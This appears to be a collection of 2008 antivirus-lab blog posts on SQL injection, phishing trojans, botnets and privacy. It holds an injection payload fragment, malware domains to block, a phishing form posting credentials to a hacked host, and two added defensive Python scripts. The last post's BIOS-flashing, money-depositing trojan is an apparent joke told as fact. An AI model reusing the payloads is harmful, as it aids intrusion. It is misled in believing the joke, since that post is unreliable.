Internet Security 2009 Beta was released on April 28th.
IS 2009 contains many new features including DeepGuard 2.0 and new engine technologies.
There's been a great deal of work put into our back-end systems that will directly impact the effectiveness of IS 2009. We're looking forward to its potential here in the lab.
The readership of this blog has been a very useful resource to the Internet Security project team in the past. They welcome you to try out 2009 and to provide feedback. Those that provide excellent feedback will be entered into a drawing. The team is still determining the prizes (it's budgeting time) but will probably come up with a couple of cool iPods and some free twelve-month licenses.
You can read the current release notes and sign up for the download from our Technology Preview pages.
And while on the topic of new technologies… if you don't have a machine to test our new beta, you can still try some of the technologies that will be included in Internet Security 2009.
Our Online Scanner 3.3.0 was released with a new mix of technologies.
It's *free* to use (requires Internet Explorer). Custom Scan options are possible. You can scan your entire system or a single folder.
Try Online Scanner from our support pages. If you're curious about some of the changes made, check out the details in the scan report.
There was a "cyberwar" in Estonia one year ago. Civil unrest, protests, and rioting culminated in DDoS attacks against Estonian government websites. What started on the streets moved online with those that couldn't be physically present taking part in DDoS attacks that lasted for more than a week.
We blogged about the attacks here (April 28th), here (April 30th), and here (May 9th).
There were plenty of DDoS tools distributed during the attacks:
The anniversary of the riots hasn't generated any activity as of yet, and we don't expect anything significant later.
More recent failed examples appear to indicate that a good deal of offline heat is required before online attacks catch fire.
Some phishing gangs have a new technique. They're using trojan-spy applications.
Last week we received the following e-mail message:
Notice that the message doesn't mention anything about providing an account-name or password.
Instead, it attempts to convince the recipient that they need to install a Digital Certificate for enhanced safety. (Anybody want to buy a bridge?)
The message links to a site with the following:
It's basically a page full of jargon designed to overwhelm the potential victim. What happens if the victim falls for the bait and installs the "certificate"? A trojan-spy will be installed.
So now the phishers don't need to ask for passwords anymore, they can just take them.
This technique keeps the classic element of phishing by mimicking the trusted institution — the bank. What they've adjusted is the part that people have become skeptical of, which is giving away their password when requested by e-mail.
There's another round of mass SQL injections going on which has infected hundreds of thousands of websites.
Performing a Google search results in over 510,000 modified pages.
As more and more websites use database back-ends to make them faster and more dynamic, it becomes crucial to verify what information gets stored in or requested from those databases — especially if you allow users to upload content themselves, which happens all the time in discussion forums, blogs, feedback forms, et cetera.
Unless that data is sanitized before it gets saved, you can't control what the website will show to its users. This is what SQL injection is all about: exploiting weaknesses in these controls. In this case the injection code starts off like this (note, this is not the complete code): DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x…
Which when decoded becomes: DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b…
So far three different domains have been used to host the malicious content — nmidahena.com, aspder.com and nihaorr1.com. A set of files loaded from these sites attempts to use different exploits to install an online gaming trojan. Right now the initial exploit page on all of the domains is inaccessible, but that could change. So if you're a firewall administrator, we recommend that you block access to them.
So what should you do?
First of all, search your website logs for the code above and see if you've been hit. If so, clean up your database to prevent your website visitors from becoming infected. Second, make sure that all the data you pass to your database is sanitized and that no code elements can be stored there. Third, block access to the sites above. Fourth, make sure the software you use is patched; F-Secure Health Check is an easy way to do this. Fifth, keep your antivirus solution up-to-date.
UPDATE: We've received some questions on the platforms and operating systems affected by this attack. So far we've only seen websites using Microsoft IIS Web Server and Microsoft SQL Server being hit. Do note that this attack doesn't exploit vulnerabilities in either of those two applications. What makes this attack possible is poorly written ASP and ASPX (.NET) code.
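The first step above, searching your web server logs for the injection prefix, is easy to automate. The following Python script is an added example and is not code from the original post or from F-Secure: it URL-decodes each log line, looks for the DECLARE @S NVARCHAR(4000);SET @S=CAST(0x… prefix quoted above, and decodes the hex payload the way SQL Server does (CAST of a binary literal to NVARCHAR reads the bytes as UTF-16LE). The log lines and the SQL text inside the payload are constructed for the example; real IIS W3C logs have more fields, but the query string is what matters here.

```python
import binascii
import re
from typing import List, Tuple
from urllib.parse import unquote

# Constructed SQL text modelled on the decoded snippet quoted in the post.
# It is used only to build a realistic-looking sample log line below.
CONSTRUCTED_SQL = (
    "DECLARE @T varchar(255),@C varchar(255) "
    "DECLARE Table_Cursor CURSOR FOR select a.name,b.name "
    "from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u'"
)


def encode_payload_hex(sql: str) -> str:
    # CAST(0x... AS NVARCHAR) makes SQL Server interpret the bytes as UTF-16LE,
    # so the hex blob in the request is the UTF-16LE encoding of the SQL text.
    return binascii.hexlify(sql.encode("utf-16-le")).decode("ascii").upper()


# Constructed log lines (date time method path query status); not real traffic.
SAMPLE_LOG = (
    "2008-04-25 10:01:12 GET /products.asp id=12 200\n"
    "2008-04-25 10:01:13 GET /images/logo.gif - 200\n"
    "2008-04-25 10:01:15 GET /products.asp "
    "id=12;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x"
    + encode_payload_hex(CONSTRUCTED_SQL)
    + "%20AS%20NVARCHAR(4000));EXEC(@S);-- 200\n"
)

# Signature of the injection prefix quoted in the post, matched after URL-decoding.
# The capture group is the hex payload that follows 0x.
SIGNATURE = re.compile(
    r"DECLARE\s+@S\s+N?VARCHAR\s*\(\s*\d+\s*\)\s*;\s*SET\s+@S\s*=\s*CAST\s*\(\s*0x([0-9A-Fa-f]+)",
    re.IGNORECASE,
)


def decode_hex_payload(hexstr: str) -> str:
    """Turn the 0x... blob back into the SQL text SQL Server would execute."""
    if len(hexstr) % 2:                # a truncated log line can leave an odd nibble
        hexstr = hexstr[:-1]
    raw = bytes.fromhex(hexstr)
    return raw.decode("utf-16-le", errors="replace")


def scan_log(text: str) -> List[Tuple[int, str]]:
    """Return (line number, decoded SQL) for every line carrying the signature."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        decoded = unquote(unquote(line))   # second pass catches %2520-style double encoding
        match = SIGNATURE.search(decoded)
        if match:
            hits.append((lineno, decode_hex_payload(match.group(1))))
    return hits


if __name__ == "__main__":
    for lineno, sql in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {sql}")
```

Run it against a real log by replacing SAMPLE_LOG with the file contents; a hit tells you which request carried the payload and what it tried to run, which is what you need before cleaning up the database. Note that decoding the payload is for triage only: the fix is the second step above, passing user input to the database only through parameterized queries rather than string concatenation.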
The best beta testers will receive a free twelve-month subscription. So if you have Windows Home Server, come give it a try.
Your feedback is invaluable. Cheers!
P.S. The Technology Preview Program currently has two other options including the March 31st release of Health Check. Reader feedback has been very useful there so please check it out if you haven't already.
On Monday SANS Internet Storm Center wrote about a targeted attack against CEOs. The e-mail messages were directly sent to senior corporate executives and properly identified them by name. The message claimed their testimony was required in a corporate lawsuit. If they clicked through on the link to read the supposed subpoena they were then asked to install a file.
And if they ran the file? Then they were really installing a trojan-spy designed to steal certificates. Here's the description of what we detect as Trojan-Spy:W32/Small.BSL.
Ero Carrera, Zynamics GmbH: Day one with "Malware — Behavior, Tools, Scripting and Advanced Analysis" presented a Python extension for Bochs, an open source CPU emulator that can be found at bochs.sourceforge.net. According to Ero, some malware such as Storm usually makes a call to some ancient APIs and uses the return values as part of its decryption routine; this cannot be reproduced by sandboxing, so the analysis never reaches the decryption part of the malware. Using a full emulator such as Bochs can bypass most of the anti-VMware tricks.
Jim Geovedi: "Hijacking VSAT Connections" was an update on a previous HITB presentation called "Hacking a Bird in The Sky: Hijacking VSAT Connections". Jim presented ways to defeat detection by local government agencies and added that this hijacking can be done via MACs, not only IPs.
Dino Covotsos from Telspace Systems gave a practical demonstration of various methods of exploiting Bluetooth technology with some freely available tools. Imagine an attacker who can read and send SMS and make premium-rate phone calls without your knowledge. He even mentioned F-Secure a few times in his presentation, "Hacking the Bluetooth Stack for Fun, Fame and Mayhem".
With Bruce Schneier as keynote speaker on day one tackling the feeling of security, and Jeremiah Grossman on day two with some nice yet scary statistics on website hacks, this has been a great two-day security conference here in Dubai.
Timo Hirvonen's Bachelor of Science thesis from the Tampere University of Technology: Antireversing Techniques. Full disclosure: Timo's reverse engineering examples in the thesis include three infamous Assembly Khallenge programs written by Kamil from our lab.
Then the bad news: only the summaries of these documents are in English. Sorry.
And while we're still on the topic: I'll be giving a lecture at Cambridge University next week. Hey, that's going to look nice on my bio.
We've been running a course at the Helsinki University of Technology covering malware analysis and antivirus technologies (we blogged about this earlier this year).
We've had many lecturers from our Security Lab giving talks on various topics during the spring. Here's Mika Ståhlberg talking about antivirus engines:
As soon as we announced that we were running such a unique course, we received lots of questions about the material. So now we're happy to announce that all the course material from the lectures is publicly available from the course webpage.
Now the course is coming to a close. The students are currently working on their final project: designing and implementing an antivirus engine. While this sounds like a daunting task (it takes a lot of time to develop a good engine), we are keeping things reasonable. The main focus is on coming up with a sound design and implementing a basic engine to test it out.
Our students have been very successful in different homework assignments such as reverse engineering puzzles, manual disassembly, emulators, and tackling anti-debugging tricks, so we're sure they'll do an excellent job with their projects as well. You can try your own skills on the homework assignments here. Do note that all the test samples available for download are harmless.
We wish good luck to all the students with their final projects!
For some time now, several ISPs in the UK have been lobbied by an advertising company called Phorm. The online advertising business generates a great deal of revenue, so it's easy to listen to promises of riches and fortune when opportunity knocks. But is the potential opportunity worth the potential risk to privacy?
Phorm's technology is a tracking solution for ISPs that would enable the display of contextual advertisements. When ISP subscribers browse the web, their content will be "deep packet" scanned to gather information about their interests. Advertisement banners will then be selected based on those interests.
The effect is similar to most adware solutions today — except it's installed on your ISP instead of your home computer.
During the summer of 2007 a large UK ISP did a trial of Phorm's technology. Thousands of customers' browsing habits were monitored. Whether the information was used, stored or shared with Phorm is unclear. Currently no ISP has this technology in use, but several in the UK have signed up as partners with Phorm.
Because the technology uses a cookie to identify each user, most antivirus vendors can create a signature for it and wipe the tracks of monitored interests. Based on the descriptions of the deployment (opt-out) and the technology, we lean towards creating such a detection signature for the cookie. The same stance has been taken by many other security vendors, and we all pull for a secure opt-in solution.
It has also come to our attention that Phorm was previously known as 121Media.
121Media was the company behind the brand PeopleOnPage. PeopleOnPage is the friendly wrapper around the advertisement engine ContextPlus. Another wrapper was called Apropos, which was one of the most widespread malicious rootkits of 2005. In 2006 the heat was too much and they shut it down. Domain registration data and website content supported the conclusion that they were all in it together.
Using multiple brands and not having full disclosure is common in the adware business. Renaming a company to clear a bad reputation has also been seen before.
In the media war against Phorm, they always come back to the extreme measures they take not to include personal or privacy-sensitive data. Even if they have good measures for this today — it doesn't mean it won't change tomorrow. Ernst and Young scrutinized their technology earlier and now 80/20 Thinking is also giving it a review — but who will look into their future upgrades after they've already sold it to the ISPs?
For our London based readers, there is a public event this evening (Tuesday) where you can ask Kent Ertugrul about Apropos and ContextPlus.
How many users did ContextPlus have? If Apropos is installed on my home computer, where can I get assistance on how to uninstall it? What was the intention of the rootkit/stealth technology in Apropos? Why should we trust Phorm?
There's recently been quite a lot of fuss about a botnet of spam trojans dubbed Kraken.
There have been claims that the botnet is the biggest currently out there, amassing over 400,000 infected computers. Most vendors in the industry have been questioning the numbers, which seem a bit inflated judging by the samples received.
Yesterday, Brian Krebs of Security Fix revealed that Damballa, the initial breaker of the Kraken story, has hijacked some of Kraken's domain names and is using the hijacked DNS resource records to count infections.
After a little bit of digging, we found one of the hostnames that Kraken uses: [censored].1dumb.com. It currently resolves to an IP address owned by the Georgia Institute of Technology, which is where Damballa resides.
We first saw earlier variants of this particular malware around the summer of 2006, so it's not exactly breaking news. It's possible that the statistics collected from this DNS trap include old, now dysfunctional variants, thus inflating the number of "new" Kraken infections.
There are many detection names for "Kraken": Oderoor, Bobax, Agent, and many more. We believe that there is a single group of people behind Kraken, updating their malware as time goes by. It's not new, it's just a new generation of something older. The latest variant is detected as: Trojan.Win32.Obfuscated.GY.
Updated to Add: Those interested in reading Damballa's point of view will find a link in this post's comments.
It's the second Tuesday of the month again, and that means it's time for scheduled updates from Microsoft.
There are five critical and three important updates this month.
The vulnerabilities released by Microsoft for April's Patch Tuesday are:
— Microsoft Windows Kernel Privilege Escalation Vulnerability
— Microsoft Windows hxvz.dll ActiveX Control Memory Corruption
— Microsoft Windows GDI Image Parsing Buffer Overflows
— Microsoft Windows DNS Client Predictable Transaction ID Vulnerability
— Microsoft Visio Two File Processing Vulnerabilities
— Microsoft Project Unspecified Code Execution Vulnerability
— Internet Explorer Data Stream Handling Vulnerability
— Microsoft VBScript/JScript Script Decoding Buffer Overflow
Malicious software and frauds are very closely related. Malware research frequently leads to our discovering new ways with which to scam victims. So we're often reading up on the topic…
The USA's Internet Crime Complaint Center (IC3) is a partnership between the FBI and the National White Collar Crime Center (NW3C). Last week the IC3 released its Annual Report for 2007. You can download a copy from here.
The report is fairly interesting reading. Besides the statistics based on its casework, the report also details a number of popular scams such as:
Pet Scams
Secret Shopper and Funds Transfer Scams
Adoption Fraud (Charity Fraud)
Romance Fraud
The Scam Synopsis also refers to a site called Looks Too Good To Be True that may be of interest to weblog readers. "Looks Too Good" details current scams and provides FAQs and Tips.
Storm has once again turned its eye to the blogging community, specifically the Blogspot.com community.
Several blogger sites with random or very quirky names have been sporting a love theme, Storm style. These sites appear to have been created solely for Storm's purposes and no legitimate blogger site has of yet been reported as infected.
Visiting these sites will lead you to another page, while keeping the Blogger menu at the top.
Clicking the site's image downloads a file called love.exe while clicking the link will provide withlove.exe.
All files are detected as Email-Worm.Win32.Zhelatin.WW since database update 2008-04-06_02.
For security reasons we have sent the message as an attachment file. This measure has been adopted to prevent personal information theft and data loss.
------------------------------------------------- © Moneybookers Ltd. All Rights Reserved. Use of this Web site is subject to our Terms and Conditions. Registered in England and Wales under Company No 4260907. Registered office: Welken House, 10-11 Charterhouse Square, London, EC1M 6EH. None of the information contained in this website constitutes, nor should be construed as Financial Advice. Internal complaint handling procedures can be requested by contacting our Customer Service Department.
The attachment is an HTML file, asking the user to participate in a Money Launder Prevention program:
When looking at the source code, we can see that the HTML file loads all the components from moneybookers.com — the real site… but the Form POST function looks funky:
<form method="POST" action="http://0xCA909D9D/HTML/verification.pl.php" style="text-align: left">
Hmmm. 0xCA909D9D. That's a weird way of presenting an IP address.
Let's see where this goes.
But of course. Turns out it's the site of the Anti-corruption commission of Bhutan:
The commission has been informed that they've been hacked.
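Hosts written as a single hex number like 0xCA909D9D are accepted by browsers because they follow the old inet_aton parsing rules, and the same rules allow a plain decimal number or octal-looking dotted parts. When triaging a phishing kit it helps to normalize such hosts to a dotted quad before looking them up or adding them to a blocklist. The following Python is an added example, not code from the original post or from F-Secure; the function names are my own, and the test hosts other than the 0xCA909D9D from the form above are constructed.

```python
import ipaddress
import re
from typing import Optional
from urllib.parse import urlsplit

# A dotted component may be 0x-prefixed hex, 0-prefixed octal, or plain decimal.
_NUMERIC_PART = re.compile(r"0[xX][0-9a-fA-F]+|[0-9]+")


def _part_value(tok: str) -> int:
    # Classic inet_aton rules: "0x" means hex, a leading "0" means octal, else decimal.
    if tok[:2].lower() == "0x":
        return int(tok[2:], 16)
    if len(tok) > 1 and tok[0] == "0":
        return int(tok, 8)
    return int(tok, 10)


def normalize_host(host: str) -> Optional[str]:
    """Return the dotted-quad form of a numeric host (1 to 4 parts, hex/octal/decimal).

    Returns None for an ordinary hostname; raises ValueError for out-of-range parts.
    """
    parts = host.split(".")
    if len(parts) > 4 or not all(_NUMERIC_PART.fullmatch(p) for p in parts):
        return None
    values = [_part_value(p) for p in parts]
    n = 0
    for v in values[:-1]:                 # leading parts are single octets
        if v > 255:
            raise ValueError(f"octet out of range in {host!r}")
        n = (n << 8) | v
    tail_bits = 8 * (5 - len(values))     # the last part fills the remaining bytes
    if values[-1] >= 1 << tail_bits:
        raise ValueError(f"trailing value out of range in {host!r}")
    n = (n << tail_bits) | values[-1]
    return str(ipaddress.IPv4Address(n))


def normalize_url_host(url: str) -> Optional[str]:
    """Extract the host from a URL and normalize it if it is numeric."""
    host = urlsplit(url).hostname
    return normalize_host(host) if host else None


if __name__ == "__main__":
    # The form action from the phishing attachment above, plus constructed variants.
    for h in ("0xCA909D9D", "3398475165", "0312.0220.0235.0235", "example.com"):
        print(f"{h:>22} -> {normalize_host(h)}")
    print(normalize_url_host("http://0xCA909D9D/HTML/verification.pl.php"))
```

The dword and octal spellings are the other two forms you will meet in phishing mails for the same reason: they survive naive "does this link contain an IP address?" filters while still being followed by the browser.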
There's been a banking trojan spam run in four European countries this morning. The targeted countries are The Netherlands, Switzerland, Latvia, and Finland.
The e-mails claim to be from a Russian student girl looking for a local sex partner — or failing that, just a friend. The mail urges the recipient to check her photos on a site called livejournalhelper.cn (in China).
Unfortunately, the site only has thumbnails of Ms. Polinka's pictures; if you try to view the larger images you're prompted by an error message of a missing plug-in that you supposedly need. The plug-in of course is the malware itself — a manual man-in-the-middle banking trojan.
Here's what the sites look like in different languages:
This malware is very closely related to the so called "Mikkeli" case, found in February.
We've seen tons of banking trojans lately, but now we've run into something quite unique.
This new banking trojan was found today from a drive-by-download site. We've added detection for it as Win32.Pril.A.
It not only infects the MBR of the machine, but also re-flashes the boot code in the Flash BIOS, making disinfection problematic.
Once an infected machine is online, the trojan monitors the user's actions, waiting for him to go to one of several hundred online banks, located all over the world.
Once the user has logged on, the banking trojan uses PCMCIA to inject code into the VGA! As an end result, the trojan creates a man-in-the-browser attack against the victim.
Now, the really surprising part is what the trojan does. Normal banking trojans would insert extra transactions or change the deposit account numbers on-the-fly. However, Win32.Pril.A doesn't withdraw money from you — it actually inserts money TO your account. This looked so weird we had to test it several times, on all of our accounts.
The drive-by-download site is still up. Normally, we wouldn't list the URL for such a site, or we would at least obfuscate it in a screenshot. However this time we'll make an exception. We will even make the link clickable: http://aprilbanking.cjb.net/.